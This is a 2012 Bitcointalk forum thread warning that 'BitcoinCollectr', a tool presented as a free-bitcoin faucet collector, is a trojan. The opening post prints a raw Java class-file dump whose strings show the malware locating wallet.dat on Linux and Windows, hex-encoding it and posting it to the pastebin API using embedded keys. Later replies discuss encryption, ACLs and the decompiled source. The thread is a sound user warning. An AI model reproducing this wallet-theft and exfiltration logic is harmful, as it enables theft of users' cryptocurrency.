Title: trojan warning "BITCOINCOLLECTR"
Post by: hamdi on May 24, 2012, 03:42:31 PM
WARNING! this tool tries to steal your wallet.dat!!! this guy ( https://bitcointalk.org/index.php?action=profile;u=57949 ) tries to lure people into using this tool via his signature right now!! http://btccollectr.bt.ohost.de/ BitcoinCollectr
beta
What is it?
BitcoinCollectr is a little project i'm working on at the moment. It makes use of websites that offer free bitcoins and automatically collects them for you.
Where can I get it?
Download here. Consider that it's still beta and probably buggy. Please report bugs to me.
Contact
yus0r@tormail.org
Donation
I know, it's not worth donating for, but if you insist: 1EZWAuXu3vfHTtBcLuEsht7q1d8Ab7dDPX
CA\FE\BA\BE\00\00\002v\00\00Main\00\00java/lang/Object\00<init>\00()V\00Code \00\00 \00\00\00LineNumberTable\00LocalVariableTable\00this\00LMain;\00main\00([Ljava/lang/String;)V\00\00FreeBitcoinService \00\00 \00\00Bitcoin Faucet \00\00\00\00\00name\00Ljava/lang/String;\00\00http://freebitcoins.appspot.com \00\00\00\00\00url?tz\E1G\AE{ \00\00!\00"\00#\00 btcAmount\00D\00%\00Daily Bitcoins\00'\00http://Daily Bitcoins?@bM\D2\F1\A9\FC\00+\00CoinAd\00-\00https://coinad.com/?h\93t\BCj~\FA\001\00Bitcoin Dispenser\003\00http://dispenser.bitbank.me/?PbM\D2\F1\A9\FC\007\00BitCrate\009\00http://http://www.bitcrate.net/?\94z\E1G\AE{\00=\00mycryptcoin.com\00?\00http://mycryptcoin.com/?`bM\D2\F1\A9\FC\00C\00BitcoinBetas\00E\00http://www.bitcoinbetas.com?\A9\99\99\99\99\99\9A\00I\00java/util/ArrayList \00H\00 \00L\00N\00M\00java/util/List\00O\00P\00add\00(Ljava/lang/Object;)Z?\ECz\E1G\AE{\00L\00T\00U\00V\00iterator\00()Ljava/util/Iterator;\00X\00Z\00Y\00java/util/Iterator\00[\00\\00next\00()Ljava/lang/Object;?\F3333333\00X\00`\00a\00b\00hasNext\00()Z\00d\00>.............................................................. \00\00f\00g\00h\00o\00(Ljava/lang/String;)V\00j\00>: BitcoinCollectr 0.8 beta 5/13/12 :\00l\00>: :\00n\00>: Author: Yus0r (yus0r@tormail.org) :\00p\00\00\00r\00: Looking for updates..\00t\00http://btccollectr.bt.ohost.de \00v\00x\00w\00Util\00y\00z\00getHTML\00&(Ljava/lang/String;)Ljava/lang/String; \00\00|\00}\00~\00getWalletFileName\00()Ljava/lang/String;\00\80\00java/io/File \00\00\82\00\00h \00\00\84\00\85\00\86\00getBytesFromFile\00(Ljava/io/File;)[B \00v\00\88\00\89\00\8A\00asHex\00([B)Ljava/lang/String; \00\00\8C\00\8D\00h\00sendPost\00\8F\00: no updates available.\00\91\00java/lang/StringBuilder\00\93\00 : Supporting \00\90\00\82\00L\00\96\00\97\00\98\00size\00()I \00\90\00\9A\00\9B\00\9C\00append\00(I)Ljava/lang/StringBuilder;\00\9E\00! free bitcoin collector websites. \00\90\00\A0\00\9B\00\A1\00-(Ljava/lang/String;)Ljava/lang/StringBuilder; \00\90\00\A3\00\A4\00~\00toString\00\A6\00: Max. possible profit @\00\00\00\00\00\00\00 \00\90\00\AA\00\9B\00\AB\00(D)Ljava/lang/StringBuilder;\00\AD\00 BTC.\00\AF\00*: Enter receiving address and press ENTER:\00\B1\00java/io/BufferedReader\00\B3\00java/io/InputStreamReader \00\B5\00\B7\00\B6\00java/lang/System\00\B8\00\B9\00in\00Ljava/io/InputStream; \00\B2\00\BB\00\00\BC\00(Ljava/io/InputStream;)V \00\B0\00\BE\00\00\BF\00(Ljava/io/Reader;)V \00\B0\00\C1\00\C2\00~\00readLine\00\C4\00: Starting..\00\C6\00: Processing <\00\C8\00>....\00\CA\00java/net/ConnectException \00\C9\00\82 \00\CD\00\CF\00\CE\00java/lang/Exception\00\D0\00\00printStackTrace \00\D2\00\CF\00\D3\00java/io/IOException\00args\00[Ljava/lang/String;\00f1\00LFreeBitcoinService;\00f2\00f3\00f4\00f5\00f6\00f7\00services\00Ljava/util/List;\00max\00s\00filename\00bytes\00[B\00hex\00Ljava/io/BufferedReader;\00address\00e\00Ljava/lang/Exception;\00e1\00Ljava/io/IOException;\00LocalVariableTypeTable\00&Ljava/util/List<LFreeBitcoinService;>;\00 StackMapTable\00\D5\00\F1\00java/lang/String\00 Exceptions\00\F4\00java/net/UnknownHostException\00\F6\00api_dev_key\00\F8\00UTF-8 \00\FA\00\FC\00\FB\00java/net/URLEncoder\00\FD\00\FE\00encode\008(Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String; \00\F0\00\00valueOf\00&(Ljava/lang/Object;)Ljava/lang/String;\00=\00 562298eb26ccc3719f7fa178f8b7fef4\00& \00 api_option\00paste\00api_user_key\00api_paste_code\00"baedd069b2f6e0948a80c7a8f3daf052: \00java/net/URL\00$http://pastebin.com/api/api_post.php \00\82 \00openConnection\00()Ljava/net/URLConnection; \00java/net/URLConnection !\00setDoOutput\00(Z)V#\00java/io/OutputStreamWriter %&'\00getOutputStream\00()Ljava/io/OutputStream; ")\00*\00(Ljava/io/OutputStream;)V ",-\00h\00write "/0\00\00flush 234\00getInputStream\00()Ljava/io/InputStream; "67\00\00close \00\B06\00content\00data\00Ljava/net/URL;\00conn\00Ljava/net/URLConnection;\00wr\00Ljava/io/OutputStreamWriter;\00rd\00lineC\00os.name \00\B5EF\00z\00getPropertyH\00Linux \00\F0JKL\00contains\00(Ljava/lang/CharSequence;)ZN\00 user.homeP\00/.bitcoin/wallet.datR\00APPDATA \00\B5TU\00z\00getenvW\00\Bitcoin\wallet.dat\00osnameZ\00java/io/FileInputStream Y\\00]\00(Ljava/io/File;)V \00_`a\00length\00()J Ycde\00read\00([B)I Y6\00file\00Ljava/io/File;\00fileInputStream\00Ljava/io/FileInputStream; \00\B5lmn\00out\00Ljava/io/PrintStream; prq\00java/io/PrintStreams\00h\00println\00 SourceFile\00 Main.java
Title: Re: trojan warning "BITCOINCOLLECTR"
Post by: rjk on May 24, 2012, 03:47:25 PM
Please break your links so that they do not get indexed and flagged.
Title: Re: trojan warning "BITCOINCOLLECTR"
Post by: giszmo on May 24, 2012, 11:40:11 PM
not too eager to investigate the claims but if it's true, why is this thread so quiet?
Title: Re: trojan warning "BITCOINCOLLECTR"
Post by: vuce on May 25, 2012, 06:10:24 AM
Even if true I don't see this as such a problem anymore, pretty much everyone should have his wallet encrypted at this time...
Title: Re: trojan warning "BITCOINCOLLECTR"
Post by: drakahn on May 25, 2012, 06:18:10 AM
there is another one too that people have fallen for "neheminer" or something, claims to be the fastest mining program but steals your wallet (and possibly changes btc addresses sent to clipboard, that may be a different trojan altogether though)
is there a way to monitor wallet.dat and stop any program from accessing it without some sort of user interaction?
Title: Re: trojan warning "BITCOINCOLLECTR"
Post by: vuce on May 25, 2012, 06:21:13 AM
is there a way to monitor wallet.dat and stop any program from accessing it without some sort of user interaction?
acl (http://en.wikipedia.org/wiki/Access_control_list)
Title: Re: trojan warning "BITCOINCOLLECTR"
Post by: drakahn on May 25, 2012, 06:24:02 AM
Title: Re: trojan warning "BITCOINCOLLECTR"
Post by: dizzy1 on May 31, 2012, 01:14:43 AM
This is a trojan. It reads the wallet.dat from the file level and pastes it to pastebin.com so if your wallet is encrypted you should be fine. Linked below is the decomplied source code.
http://freeter.me:81/BitcoinCollectr0.8beta.src.zip (http://freeter.me:81/BitcoinCollectr0.8beta.src.zip)
Title: Re: trojan warning "BITCOINCOLLECTR"
Post by: rjk on May 31, 2012, 01:23:27 AM
This is a trojan. It reads the wallet.dat from the file level and pastes it to pastebin.com so if your wallet is encrypted you should be fine. Linked below is the decomplied source code.
http://freeter.me:81/BitcoinCollectr0.8beta.src.zip (http://freeter.me:81/BitcoinCollectr0.8beta.src.zip)
Maybe if you send the pastebin-related source snippet to pastebin, maybe they can help identify the user based on the included dev and user API keys?
Title: Re: trojan warning "BITCOINCOLLECTR"
Post by: hamdi on June 07, 2012, 12:50:07 AM
the virus is pretty cool though
|